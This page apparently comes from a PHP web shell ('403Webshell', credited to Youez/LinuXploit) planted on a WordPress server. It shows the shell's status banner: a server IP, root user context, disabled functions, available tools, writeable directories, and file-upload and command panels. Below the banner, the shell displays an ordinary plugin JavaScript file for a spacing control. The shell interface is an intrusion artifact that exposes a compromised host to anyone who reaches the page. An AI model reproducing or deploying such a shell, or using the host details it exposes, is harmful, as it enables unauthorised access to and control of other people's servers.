403Webshell
Server IP : 38.190.208.107  /  Your IP : 216.73.217.46
Web Server : nginx/1.28.1
System : Linux ht2026040333114 6.1.0-10-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.37-1 (2023-07-03) x86_64
User : root ( 0)
PHP Version : 8.2.28
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv,eval,assert,passthru,system,exec,shell_exec,popen,proc_open
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /www/wwwroot/wp.3/wp-content/plugins/Ultimate_VC_Addons/admin/vc_extend/js/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /www/wwwroot/wp.3/wp-content/plugins/Ultimate_VC_Addons/admin/vc_extend/js/ultimate-spacing.js
( function ( $, window, undefined ) {
	function update_inputs( t ) {
		const status = t.find( '.ult-spacing-all' ).attr( 'data-status' );
		const unit = t.find( '.ult-unit-spacing option:selected' ).val();

		if ( status === 'hide-me' ) {
			//  Add {single} input values
			var vals = '';
			t.find( '.ult-spacing-single .ultimate-spacing-input' ).each(
				function ( index, el ) {
					const spacing_type = $( el ).attr( 'data-id' ) || '';
					const val = $( el ).val() || '';
					if ( $.isNumeric( val ) ) {
						vals += spacing_type + ':' + val + unit + ';';
					}
				}
			);
			t.find( '.ultimate-spacing-value' ).val( vals );
		} else {
			//  Add {all} spacing values
			var vals = '';
			const alls = t.find( '.ult-spacing-all .ultimate-spacing-input' );
			const spacing_type = alls.attr( 'data-id' ) || '';

			const val = alls.val() || '';
			if ( $.isNumeric( val ) ) {
				vals += spacing_type + ':' + val + unit + ';';
			}
			t.find( '.ultimate-spacing-value' ).val( vals );
		}
	}

	/* Toggle inputs */
	function toggle_update_inputs( t ) {
		t.find( '.ult-spacing-expand' ).toggleClass(
			'ult-spacing-expand-section'
		);

		const status = t.find( '.ult-spacing-all' ).attr( 'data-status' );
		const unit = t.find( '.ult-unit-spacing option:selected' ).val();

		if ( status === 'hide-all' ) {
			t.find( '.ult-spacing-all' ).hide();
			t.find( '.ult-spacing-single' ).show();
			t.find( '.ult-spacing-all' ).attr( 'data-status', 'hide-me' );

			//  Add {single} input values
			var vals = '';
			t.find( '.ult-spacing-single .ultimate-spacing-input' ).each(
				function ( index, el ) {
					const spacing_type = $( el ).attr( 'data-id' ) || '';
					const val = $( el ).val() || '';
					if ( $.isNumeric( val ) ) {
						vals += spacing_type + ':' + val + unit + ';';
					}
				}
			);
			t.find( '.ultimate-spacing-value' ).val( vals );
		} else {
			t.find( '.ult-spacing-all' ).show();
			t.find( '.ult-spacing-single' ).hide();
			t.find( '.ult-spacing-all' ).attr( 'data-status', 'hide-all' );

			//  Add {all} spacing values
			var vals = '';
			const alls = t.find( '.ult-spacing-all .ultimate-spacing-input' );
			const spacing_type = alls.attr( 'data-id' ) || '';

			const val = alls.val() || '';
			if ( $.isNumeric( val ) ) {
				vals += spacing_type + ':' + val + unit + ';';
			}
			t.find( '.ultimate-spacing-value' ).val( vals );
		}
	}

	$( '.ultimate-spacing' ).each( function ( index, element ) {
		const t = $( element );
		get_values_from_hidden_field( t );
		set_values_from_hidden_field( t );
	} );

	function get_values_from_hidden_field( t ) {
		const mv = t.find( '.ultimate-spacing-value' ).val() || null;

		if ( typeof mv !== 'undefined' && mv != null ) {
			const vals = mv.split( ';' );
			$.each( vals, function ( i, vl ) {
				if ( vl != '' ) {
					t.find( '.ultimate-spacing-inputs' ).each( function (
						input_index,
						elem
					) {
						const splitval = vl.split( ':' );
						const dataid = $( elem ).attr( 'data-id' );
						if ( dataid == splitval[ 0 ] ) {
							const tmp = splitval[ 1 ].match( /\d+/ );
							const b = splitval[ 1 ].split( tmp );
							let unit = 'px';
							if (
								typeof b[ 1 ] !== 'undefined' &&
								b[ 1 ] != null
							) {
								unit = b[ 1 ];
							}
							t.find( '.ult-unit-spacing' ).val( unit ); // set border select unit

							//var unit = $(elem).attr("data-unit");
							mval = splitval[ 1 ].split( unit );
							$( elem ).val( mval[ 0 ] );
						}

						//  Toggle Inputs
						if (
							splitval[ 0 ] === 'margin' ||
							splitval[ 0 ] === 'padding'
						) {
							t.find( '.ult-spacing-all' ).show();
							t.find( '.ult-spacing-single' ).hide();
							t.find( '.ult-spacing-all' ).attr(
								'data-status',
								'hide-all'
							);
							t.find( '.ult-spacing-expand' ).toggleClass(
								'ult-spacing-expand-section'
							);
						} else {
							t.find( '.ult-spacing-all' ).hide();
							t.find( '.ult-spacing-single' ).show();
							t.find( '.ult-spacing-all' ).attr(
								'data-status',
								'hide-me'
							);
						}
					} );
				}
			} );
		} else {
			////   Here, Doen't have any save values. So,
			//// Hide all
			t.find( '.ult-spacing-single' ).hide();

			t.find( '.ult-spacing-expand' ).toggleClass(
				'ult-spacing-expand-section'
			);

			////   Add defaults to input
			t.find( '.ultimate-spacing-inputs' ).each( function (
				input_index,
				elem
			) {
				const d = $( elem ).attr( 'data-default' );
				$( elem ).val( d );
			} );

			//  Add to hidden
			const unit =
				t.find( '.ultimate-spacing-value' ).attr( 'data-unit' ) || 'px';
			t.find( '.ult-unit-spacing' ).val( unit );
			let nval = '';
			//var unit = t.find(".ult-unit-spacing option:selected").val();
			t.find( '.ult-spacing-single .ultimate-spacing-input' ).each(
				function ( index, elm ) {
					const ival = $( elm ).val();
					if ( $.isNumeric( ival ) ) {
						const item =
							$( elm ).attr( 'data-id' ) +
							':' +
							$( elm ).val() +
							unit +
							';';
						nval += item;
					}
				}
			);
			t.find( '.ultimate-spacing-value' ).val( nval );
		}
	}

	function set_values_from_hidden_field( t ) {
		// 1. Expand / Collapse
		t.find( '.ult-spacing-expand' ).click( function ( event ) {
			toggle_update_inputs( t );
		} );

		// 2. Unit change
		t.find( '.ult-unit-spacing' ).change( function () {
			update_inputs( t );
		} );

		//  Single
		t.find( '.ult-spacing-single .ultimate-spacing-input' ).on(
			'change',
			function ( e ) {
				let nval = '';
				//  add all spacing widths, margins, paddings
				t.find( '.ult-spacing-single .ultimate-spacing-input' ).each(
					function ( index, elm ) {
						const ival = $( elm ).val();
						const unit = t
							.find( '.ult-unit-spacing option:selected' )
							.val();
						if ( $.isNumeric( ival ) ) {
							const item =
								$( elm ).attr( 'data-id' ) +
								':' +
								$( elm ).val() +
								unit +
								';';
							nval += item;
						}
					}
				);
				t.find( '.ultimate-spacing-value' ).val( nval );
			}
		);

		//  All
		t.find( '.ult-spacing-all .ultimate-spacing-input' ).on(
			'change',
			function ( e ) {
				let nval = '';
				//  add all spacing widths, margins, paddings
				t.find( '.ult-spacing-all .ultimate-spacing-input' ).each(
					function ( index, elm ) {
						const ival = $( elm ).val();
						const unit = t
							.find( '.ult-unit-spacing option:selected' )
							.val();
						if ( $.isNumeric( ival ) ) {
							const item =
								$( elm ).attr( 'data-id' ) +
								':' +
								$( elm ).val() +
								unit +
								';';
							nval += item;
						}
					}
				);
				t.find( '.ultimate-spacing-value' ).val( nval );
			}
		);
	}
} )( jQuery, window );

Youez - 2016 - github.com/yon3zu
LinuXploit